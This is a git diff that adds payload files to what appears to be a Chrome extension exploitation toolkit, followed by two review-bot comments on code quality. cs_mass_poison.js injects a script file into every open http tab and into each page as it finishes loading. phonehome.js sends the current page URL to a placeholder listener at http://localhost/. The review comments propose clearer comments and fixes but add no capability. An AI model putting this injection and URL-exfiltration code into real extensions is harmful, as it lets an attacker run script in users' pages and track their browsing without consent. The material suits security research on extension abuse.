diff --git a/tools/chrome_extensions_exploitation/payloads/cs.js b/tools/chrome_extensions_exploitation/payloads/cs.js
new file mode 100644
index 000000000..c952180ab
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/payloads/cs.js
@@ -0,0 +1,2 @@
+// sample payload
+console.log(location.href);
diff --git a/tools/chrome_extensions_exploitation/payloads/cs_mass_poison.js b/tools/chrome_extensions_exploitation/payloads/cs_mass_poison.js
new file mode 100644
index 000000000..d07e5e7fd
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/payloads/cs_mass_poison.js
@@ -0,0 +1,23 @@
+// add a /cs.js file to extension and have it run in a content script on every tab
+var INJECTOR_CS_PAYLOAD = '/cs.js';
+// requires tabs permissions
+
+chrome.tabs.query({}, function (tabs) {
+ for (var i = 0; i < tabs.length; i++) {
+ if (tabs[i].url.match('^http')) {
+ chrome.tabs.executeScript(tabs[i].id, {
+ allFrames: true,
+ file: INJECTOR_CS_PAYLOAD});
+ }
+ }
+ }
+);
+
+chrome.tabs.onUpdated.addListener( function (tabId, changeInfo, tab) {
+ if (changeInfo.status == 'complete' && tab.url.match('^http')) {
+ chrome.tabs.executeScript(tabId, {
+ allFrames: true,
+ file: INJECTOR_CS_PAYLOAD
+ });
+ }
+});
diff --git a/tools/chrome_extensions_exploitation/payloads/phonehome.js b/tools/chrome_extensions_exploitation/payloads/phonehome.js
new file mode 100644
index 000000000..533331e1f
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/payloads/phonehome.js
@@ -0,0 +1,6 @@
+var x = new XMLHttpRequest();
+x.open('get', 'http://localhost/?url=' + encodeURIComponent(location.href), true);
+x.onload = x.onerror = function() {
+console.log('phoned home');
+}
+x.send(null);
\ No newline at end of file
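Review bot: In cs_mass_poison.js the comment `// requires tabs permissions` understates the preconditions of the code below it. `tab.url` is only populated when the extension holds the `tabs` permission (or matching host permissions), and `chrome.tabs.executeScript` also needs host access to each page and exists only in Manifest V2. Without `tabs`, `tabs[i].url` is undefined and `.match` throws, which ends the loop at the first tab. I would replace the comment with `// requires "tabs" plus host permissions for http(s) pages; Manifest V2 only (chrome.tabs.executeScript)`, which also tells anyone auditing a manifest which grants to look for. Both `executeScript` calls are identical apart from the tab id, so a small shared helper would remove the duplication, and `==` on `changeInfo.status` should be `===`.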
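Review bot: In phonehome.js the same function is assigned to `x.onload` and `x.onerror`, so `'phoned home'` is logged even when the request fails. Splitting the handlers, for example `x.onerror = function () { console.log('phone home failed'); };`, would make the sample's output trustworthy during testing. Unlike the other two payloads, this file has no header comment. One such as `// sample payload: reports the page URL to a placeholder http://localhost/ listener (test use only)` would make clear that the endpoint is a stand-in and that the full page URL, query string included, is sent over plain HTTP. The file also lacks a trailing newline.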